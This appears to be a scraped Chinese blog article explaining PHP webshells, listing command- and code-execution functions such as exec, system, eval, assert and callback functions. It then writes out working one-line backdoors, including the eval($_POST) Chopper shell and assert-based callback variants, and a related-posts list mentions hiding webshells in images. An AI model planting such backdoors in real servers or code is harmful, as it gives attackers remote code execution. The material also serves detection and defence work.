2. 程式人生 > >淺析PHP-webshell

淺析PHP-webshell

阿新 發佈:2018-11-22

一、PHP後門函式

1、命令執行函式

exec

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:執行一個外部程式,返回命令執行結果最後一行內容

string exec ( string $command [, array &$output [, int &$return_var ]] )

<?php
   echo exec('cd');  //D:\phpStudy\PHPTutorial\WWW
   echo exec('ipconfig');  //. . . . . . . . . . . . . : 172.31.100.1
?>

shell_exec

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:通過 shell 環境執行命令,並且將完整的輸出以字串的方式返回

string shell_exec ( string $cmd )

<?php
   echo shell_exec('ipconfig');  //顯示ipconfig命令全部內容
?>

passthru

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:執行外部程式並且顯示原始輸出(全部原始內容,不用輸出)

void passthru ( string $command [, int &$return_var ] )

<?php
   passthru('ipconfig'); //顯示ipconfig全部內容
?>

system

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:執行外部程式並且顯示輸出

string system ( string $command [, int &$return_var

 ] )

<?php
   echo system('ipconfig');  //顯示ipconfig命令全部內容
?>

當然還有其它執行系統命令的函式,如popen()、proc_open(),但這兩個函式不返回命令執行結果。

2、PHP程式碼執行函式

eval

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:把字串作為PHP程式碼執行

mixed eval ( string $code )

<?php
    eval('phpinfo();');
?>

assert

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:檢查一個斷言是否為 FALSE

bool assert ( mixed $assertion [, string $description ] )

如果 assertion 是字串,它將會被 assert() 當做 PHP 程式碼來執行。

<?php
    assert(phpinfo());
    assert('print 123');
?>

preg_replace 

適用範圍:PHP 4, PHP 5, PHP 7        函式作用:執行一個正則表示式的搜尋和替換

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

/e 修正符使 preg_replace() 將 replacement 引數當作 PHP 程式碼執行

<?php
    preg_replace("//e","phpinfo()","");  //執行phpinfo()成功
?>

3、回撥函式

解釋:把函式作為引數傳入進另一個函式中使用。

call_user_func

把第一個引數作為回撥函式呼叫

call_user_func_array

呼叫回撥函式,並把一個數組引數作為回撥函式的引數

usort

使用使用者自定義的比較函式對陣列中的值進行排序

register_shutdown_function

<?php register_shutdown_function('assert','phpinfo();');?>

註冊一個會在php中止時執行的函式

array_map

為陣列的每個元素應用回撥函式

array_walk

使用使用者自定義函式對陣列中的每個元素做回撥處理

array_filter

用回撥函式過濾陣列中的單元

array_reduce

用回撥函式迭代地將陣列簡化為單一的值

array_udiff

用回撥函式比較資料來計算陣列的差集

array_uintersect

計算陣列的交集,用回撥函式比較資料

array_diff_uassoc

用使用者提供的回撥函式做索引檢查來計算陣列的差集

array_diff_ukey

用回撥函式對鍵名比較計算陣列的差集

等等,其它含有回撥函式的函式

二、後門構造

普通後門,通過各種方法構造動態函式:

<?php 
    @eval($_POST['admin']);  //菜刀的後門

    //稍微變形下的後門
    $_GET['func']($_REQUEST['pass']);  
    $_GET['POST']($_POST['GET']);
    ......
?>

通過回撥函式進行構造後門

<?php
    call_user_func('assert', $_POST['pass']);
    call_user_func_array('assert', array($_POST['pass']));

    //陣列回撥進行構造後門
    $arr=array($_POST['pass']);
    array_filter($arr,'assert');
    array_map('assert', $arr);
    uasort($arr, 'assert');
    //等等,用回撥函式進行構造
?>

 

 

 

相關推薦

淺析PHP-webshell

一、PHP後門函式 1、命令執行函式 exec 適用範圍:PHP 4, PHP 5, PHP 7        函式作用:執行一個外部程式,返回命令執行結果最後一行內容。 string exec ( string&

php webshell常見函數

轉碼 targe pla enc ebs pack ace waf 字符 0x1 直接在字符串變量後面加括號, 會調用這個函數: <?php $s = ‘system‘; $e = ‘assert‘; $s(‘whoami‘); $e(‘phpinfo();‘);

淺析PHP程序員必要了解html5繪畫標簽<canvas>

剪切 time http 常用 doc 畫筆 offsetx php程序 自己的   目前HTML5還在大行其道,伴隨產生了很多新的代碼辦法。   其中一個便是基於HTML5的遊戲,例如微信推廣中用到的小遊戲------神經貓 或可以單獨下載運行的萌寵消除類型遊戲   這

淺析PHP中處理HTML特殊字符轉換

order charset body special 前臺 regular 混亂 base ble 我們在用PHP處理頁面顯示內容時,經常會遇到一些特殊字符轉換問題,如果處理不當就會導致頁面顯示混亂,不能得到目標效果。所以本文我們將和大家一起歸納總結PHP中處理HTML特殊

淺析PHP中的閉包和匿名函數

his order clas 是否 spa sprint %s spl 逗號 PHP閉包和匿名函數使用的句法與普通函數相同,但閉包和匿名函數其實是偽裝成函數的對象(Closure類的實例) 。下面給大家介紹PHP中的閉包和匿名函數知識,需要的朋友參考下吧 閉包是指在創建時封

淺析 PHP 中的 Generator

  淺析 PHP 中的 Generator   Miss Wang php開發案例 前天   何為 Generator   從 PHP 5.5 開始,PHP 加入了一個新的特性,那就是 Generator,中文譯為生成器。生成器可以簡單地用來實現物件的迭代,讓我們先從官方的一個小例子說起。   x

淺析php過濾html字串,防止SQL注入的方法

本篇文章是對php中過濾html字串,防止SQL注入的方法進行了詳細的分析介紹,需要的朋友參考下   批量過濾post,get敏感資料 複製程式碼 程式碼如下: $_GET = stripslashes_array($_GET); $_POST = st

淺析PHP執行機制與流程

一、PHP設計理念及特點 1、多程序模型:由於PHP是多程序模型,不同請求間互不干涉,這樣保證了一個請求掛掉不會對全盤服務造成影響。 2、弱型別語言:一個變數的型別並不是一開始就確定不變,執行中才會確定並可能發生隱式或顯式的型別轉換,這種機制的靈活性在web

B374K PHP WEBSHELL:一款簡單卻功能強大的遠端管理工具

https://github.com/b374k/b374k 文中提及的部分技術、工具可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用! B374K WebShell 是一個非常有用的遠端管理工具,管理員通過瀏覽器就可以遠端管理遠端計算機。 B374K非常簡單,簡單到只有一個php檔案,

淺析PHP中cookie與session技術

1.cookie是什麼? cookie指某些網站為了辨別使用者身份、進行session跟蹤而儲存在使用者本地終端上的資料(通常經過加密)。 通俗來理解就是,你去一個專賣店或者超市買東西,然後店裡給你辦一張會員卡,以後你的身份和購買資訊都存在這個卡里,而這個卡放你身上。之後每

淺析PHP類的自動載入和名稱空間

php是使用require(require_once)和include(include_once)關鍵字載入類檔案。但是在實際的開發工程中我們基本上不會去使用這些關鍵字去載入類。 因為這樣做會使得程式碼的維護相當的困難。實際的開發中我們會在檔案的開始位置用use關鍵字使用類,然後直接new這個類就可以了. 至

PHP最短webshell的思考

papers set 執行 ref inux 多個 hide http htm 轉自:http://ecma.io/483.html The shortest webshell of PHP 某天閑逛wooyun,發現一篇挺有意思的文章————《32C3 CTF 兩個W

php隱藏WEBSHELL技巧

web color div html get pos erp order nts 把shell添加到網站logo圖片裏: cat logo.png shell.php > logo.png 在網站任意一個php文件裏添加下面的最簡單方法: fputs(fop

整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php免殺一句話)

一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1

webshellphp方向的研究(精華篇)

制作 日誌 css 來講 用戶 復制 加解密 get original 文章主旨:準備學習c語言,你喜歡的所有幹貨在文末附件裏 作者宗旨:沒有不想當將軍的兵,沒有不想提高技術的person,今天帶你打開php的研究之路。 本文作者:Laimooc(原名xoanHn),個人站

Ajax中的JSON格式與php傳輸過程的淺析

resp 我們 cti val ati 裏的 class xhr sta   在Ajax中的JSON格式與php傳輸過程中有哪些要註意的小地方呢?   先來看一下簡單通用的JSON與php傳輸數據的代碼 HTML文件: <input type="button"

新手 php連接數據庫大概。簡單過程淺析以及遇到的問題分析

文件夾 .com sql als use 情況下 庫文件 定義 英文符號 重點:PHP運行在服務器上的請記住!!! 1.在連接數據庫與PHP之前首先要檢查一下自己PHP文件夾裏的php.ini配置文件裏是否有 ;extension=php_mysqli.dll 有

PHP 工廠模式淺析

func nfa new 的人 不存在 類工廠 實例 class method //抽象出一個人的接口interface Person{ public function showInfo();}//繼承於人的學生類class Student implements Pe

php版網站站打包程序【配合webshell】(原創)

在線 arr bst 文件類型 ava checked length extra 分享圖片 因為大馬只能下載一些單文件,無法下載文件夾裏的文件,所以花費一些時間寫了一個PHP腳本,打包全站數據,在此分享!切勿做違法事情! 使用方法: 1、將該程序上傳到

PHP的路由淺析

.什麼是php的路由機制 檔案的相互包含,其次就是路由分配。當我們不利用成熟的PHP框架進行web開發時,我們就會發現上述兩個問題會是很困擾我們的問題所在。 1、路由機制就是把某一個特定形式的URL結構中提煉出來系統對應的引數。 舉個例子,如:http://main.wopop.co